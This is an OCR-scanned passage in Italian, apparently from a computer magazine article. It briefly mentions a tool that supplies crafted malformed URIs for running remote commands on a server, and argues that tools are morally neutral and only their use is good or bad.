trovano per le mani uno strumento piut¬ 
tosto potente che addirittura fornisce loro 
uri malformati ad arte per poter esegui¬ 
re comandi remoti su un server con un 
semplice click. Ma il discorso è sempre lo 
stesso: non si tratta mai di valutare se 
uno strumento è di per se buono o catti¬ 
vo. Buono o cattivo sarà sempre e solo 
l'utilizzo che se ne fa. HI 
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